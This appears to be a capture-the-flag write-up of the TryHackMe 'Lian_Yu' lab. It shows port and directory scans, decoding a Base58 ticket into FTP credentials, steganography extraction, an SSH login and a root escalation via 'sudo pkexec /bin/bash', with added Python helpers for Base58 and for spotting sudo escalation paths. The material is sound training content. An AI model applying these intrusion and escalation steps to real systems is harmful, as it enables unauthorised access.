THM: Lian_Yu

Nmap
First we scan for open ports: all TCP ports (-p-), with version detection and the default script set.
# nmap -p- -T4 -sV -sC 10.10.158.146 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 14:21 BST
Nmap scan report for 10.10.158.146
Host is up (0.026s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37797/udp6 status
| 100024 1 38837/tcp6 status
| 100024 1 45522/udp status
|_ 100024 1 60402/tcp status
60402/tcp open status 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.76 seconds
Website
The initial website is just a static page that doesn't really give anything away, so we run a gobuster scan.
# gobuster dir -u http://10.10.158.146 -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/island (Status: 301) [Size: 236] [--> http://10.10.158.146/island/]
/server-status (Status: 403) [Size: 199]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
Visiting the /island/ directory shows us a basic message with a "hidden" code word rendered in white text (invisible on the page, but plain in the HTML source); this turns out to be the username we need later. We run another gobuster scan against /island/, which finds the 2100 directory. Checking that page gives us another clue in its source code, a hint at the .ticket file extension.
# gobuster dir -u http://10.10.158.146/island/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.146/island/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/2100 (Status: 301) [Size: 241] [--> http://10.10.158.146/island/2100/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
We run another gobuster scan in this directory, but this time with the .ticket extension. This finds us another page.
# gobuster dir -u http://10.10.158.146/island/2100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.158.146/island/2100/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: ticket
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/green_arrow.ticket (Status: 200) [Size: 71]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
FTP
After a bit of trial and error in CyberChef we work out that the ticket was encoded as Base58. A quick check saves some guessing here: a Base58 string never contains 0, O, I, l, + or / and carries no = padding, so an alphanumeric blob that has none of those characters and decodes to garbage as Base64 is a strong hint to try Base58. Using the decoded value as the password and the username discovered earlier we can log in to the FTP service. There are 3 files and we download them all. We also check whether we can navigate anywhere else; we can, but the only useful information we reveal is that there is another user called slade, whose home directory (mode drwx------) we cannot read.
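The decoding step, as an added example that is not from the original writeup: a small Base58 codec in Python plus the alphabet check that tells Base58 apart from Base64 before reaching for CyberChef. The ticket value it decodes is a constructed stand-in, not the contents of green_arrow.ticket, and the function names are this example's own.

```python
# Added example (not from the original writeup): a minimal Base58 codec plus a
# quick alphabet check that separates Base58 from Base64/Base32 candidates.
# SAMPLE_TICKET below is CONSTRUCTED for this example; the real
# green_arrow.ticket content is not reproduced here.

B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"  # no 0, O, I, l
B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
B32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567="


def b58encode(data: bytes) -> str:
    """Encode bytes as Base58: big-endian integer, leading zero bytes become '1'."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = B58[r] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def b58decode(s: str) -> bytes:
    """Decode Base58; raises ValueError on any character outside the alphabet."""
    s = s.strip()
    n = 0
    for ch in s:
        idx = B58.find(ch)
        if idx < 0:
            raise ValueError(f"not a Base58 character: {ch!r}")
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))          # each leading '1' is a 0x00 byte
    return b"\x00" * pad + body


def candidate_encodings(s: str) -> list:
    """Return the encodings whose alphabet covers every character of s.

    Base64's alphabet covers almost every Base58 string too, so the practical
    hint is: no 0/O/I/l/+/=, and a Base64 decode that yields garbage.
    """
    s = s.strip()
    cands = []
    for name, alphabet in (("base58", B58), ("base64", B64), ("base32", B32)):
        if s and all(c in alphabet for c in s):
            cands.append(name)
    return cands


def decode_ticket(ticket: str) -> str:
    """Decode a Base58 ticket to text, as the writeup did with CyberChef."""
    return b58decode(ticket).decode("utf-8")


# Constructed stand-in for the ticket file (NOT the real one from the box).
SAMPLE_TICKET = b58encode(b"not_the_real_password")

if __name__ == "__main__":
    print(candidate_encodings(SAMPLE_TICKET))
    print(decode_ticket(SAMPLE_TICKET))
```

Run it against the real ticket with `decode_ticket(open("green_arrow.ticket").read())`; if the file holds anything outside the alphabet the decoder refuses rather than silently producing a wrong password.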
# ftp -A 10.10.158.146
Connected to 10.10.158.146.
220 (vsFTPd 3.0.2)
Name (10.10.158.146:root): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
Looking through the acquired images we can see that aa.jpg and Queen's_Gambit.png both open normally; however, Leave_me_alone.png is not even detected as a valid image. Digging deeper into the file we can see that the magic bytes at the start of the file are wrong. Comparing it with the good PNG, the first six bytes are 58 45 6f ae 0a 0d where a PNG must begin with 89 50 4e 47 0d 0a 1a 0a; the trailing 1a 0a and the IHDR chunk at offset 8 are intact, so only the signature needs to be rewritten.
# xxd Queen\'s_Gambit.png | head
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 0500 0000 02d0 0806 0000 00cf 7ddd ..............}.
00000020: 5600 0000 0173 5247 4200 aece 1ce9 0000 V....sRGB.......
00000030: 0159 6954 5874 584d 4c3a 636f 6d2e 6164 .YiTXtXML:com.ad
00000040: 6f62 652e 786d 7000 0000 0000 3c78 3a78 obe.xmp.....<x:x
00000050: 6d70 6d65 7461 2078 6d6c 6e73 3a78 3d22 mpmeta xmlns:x="
00000060: 6164 6f62 653a 6e73 3a6d 6574 612f 2220 adobe:ns:meta/"
00000070: 783a 786d 7074 6b3d 2258 4d50 2043 6f72 x:xmptk="XMP Cor
00000080: 6520 352e 342e 3022 3e0a 2020 203c 7264 e 5.4.0">. <rd
00000090: 663a 5244 4620 786d 6c6e 733a 7264 663d f:RDF xmlns:rdf=
# xxd Leave_me_alone.png | head
00000000: 5845 6fae 0a0d 1a0a 0000 000d 4948 4452 XEo.........IHDR
00000010: 0000 034d 0000 01db 0806 0000 0017 a371 ...M...........q
00000020: 5b00 0020 0049 4441 5478 9cac bde9 7a24 [.. .IDATx....z$
00000030: 4b6e 2508 33f7 e092 6466 dea5 557b 6934 Kn%.3...df..U{i4
00000040: 6a69 54fd f573 cebc c03c 9c7e b4d4 a556 jiT..s...<.~...V
00000050: 4955 75d7 5c98 5c22 c2dd 6c3e 00e7 c0e0 IUu.\.\"..l>....
00000060: 4e66 a94a 3d71 3f5e 32c9 085f cccd 60c0 Nf.J=q?^2.._..`.
00000070: c1c1 41f9 7ffe dfff bb2f eb22 fab5 aeab ..A....../."....
00000080: 7d9d cfe7 f81e 5fcb 49ce ed94 7eb7 d8d7 }....._.I...~...
00000090: 723c c9e9 7492 d3d3 494e c793 9c8f 8b2c r<..t...IN.....,
With a bit of hex editing we can repair the file by writing the correct signature over its first eight bytes. Once we have done this, it opens normally and reveals a password. We try running steghide against the jpg image using the password we have just found (steghide only supports JPEG, BMP, WAV and AU carriers, so aa.jpg is the only candidate among the three files) and it gives us a zip file.
# steghide extract -sf aa.jpg
Enter passphrase:
wrote extracted data to "ss.zip".
Unzipping this gives us 2 more files, one of which looks like a password.
# unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
# cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
# cat shado
M*******n
Using this password with the other account we know exists (slade) to log on over SSH gets us the user flag.
# ssh slade@10.10.158.146
slade@10.10.158.146's password:
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
██╗ ██╗███████╗██╗ ██████╗ ██████╗ ███╗ ███╗███████╗██████╗
██║ ██║██╔════╝██║ ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗ ██║ ██║ ██║ ██║██╔████╔██║█████╗ █████╔╝
██║███╗██║██╔══╝ ██║ ██║ ██║ ██║██║╚██╔╝██║██╔══╝ ██╔═══╝
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚══════╝
██╗ ██╗ █████╗ ███╗ ██╗ ██╗ ██╗██╗ ██╗
██║ ██║██╔══██╗████╗ ██║ ╚██╗ ██╔╝██║ ██║
██║ ██║███████║██╔██╗ ██║ ╚████╔╝ ██║ ██║
██║ ██║██╔══██║██║╚██╗██║ ╚██╔╝ ██║ ██║
███████╗██║██║ ██║██║ ╚████║███████╗██║ ╚██████╔╝
╚══════╝╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═════╝ #
slade@LianYu:~$ ls
user.txt
slade@LianYu:~$ cat user.txt
THM{P**********************************T}
--Felicity Smoak
Privilege escalation
Checking the rights we have, we see we can run pkexec as root with sudo. This is a plain sudoers misconfiguration rather than a pkexec bug: sudo already runs pkexec as root, so pkexec launches whatever program we name as root with no further polkit prompt, which gives us a very simple escalation to root and the flag. The PASSWD tag only means sudo asks for slade's own password first, and we have that.
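As an added example that is not from the original writeup: a parser for `sudo -l` output that pulls out each (runas, tags, command) entry and flags the ones that hand back a root shell. The embedded input is this box's `sudo -l` output; SHELL_SPAWNERS is a short illustrative subset of the programs GTFOBins lists for sudo, not a complete reference, and the function names are this example's own.

```python
# Added example (not from the original writeup): parse `sudo -l` output into
# (runas, tags, command) entries and flag those that give a root shell.
# SAMPLE_SUDO_L is the output from this box; SHELL_SPAWNERS is a small
# illustrative subset of what GTFOBins lists, not a complete list.
import os
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
"""

SHELL_SPAWNERS = {"pkexec", "bash", "sh", "dash", "zsh", "env", "find", "vim", "vi",
                  "less", "more", "awk", "perl", "python", "python3"}

# "(runas) TAG1: TAG2: cmd1, cmd2"; tags such as NOPASSWD/PASSWD/SETENV/NOEXEC are optional
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(text: str) -> list:
    """Return one dict per command allowed in the 'may run the following commands' section."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue                          # skip the Defaults section
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmds").split(", "):
            entries.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd.strip()})
    return entries


def root_shell_candidates(entries: list) -> list:
    """Entries runnable as root (or ALL) whose program is known to spawn a shell, or ALL."""
    hits = []
    for e in entries:
        runas_user = e["runas"].split(":")[0].strip()     # "(ALL : ALL)" -> "ALL"
        if runas_user not in ("root", "ALL"):
            continue
        program = e["command"].split()[0]
        if e["command"] == "ALL" or os.path.basename(program) in SHELL_SPAWNERS:
            hits.append(e)
    return hits


if __name__ == "__main__":
    for hit in root_shell_candidates(parse_sudo_l(SAMPLE_SUDO_L)):
        print("root shell via sudo:", hit["command"], hit["tags"])
```

On this box it reports `/usr/bin/pkexec` with the PASSWD tag, which is exactly the entry used below; the same parser handles NOPASSWD, multiple comma-separated commands and `(ALL : ALL)` runas specs.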
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ sudo pkexec /bin/bash
root@LianYu:~# ls
root.txt
root@LianYu:~# cat root.txt
Mission accomplished
You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE.
THM{M************************************************************************************D}
--DEATHSTROKE
Let me know your comments about this machine :)
I will be available @twitter @User6825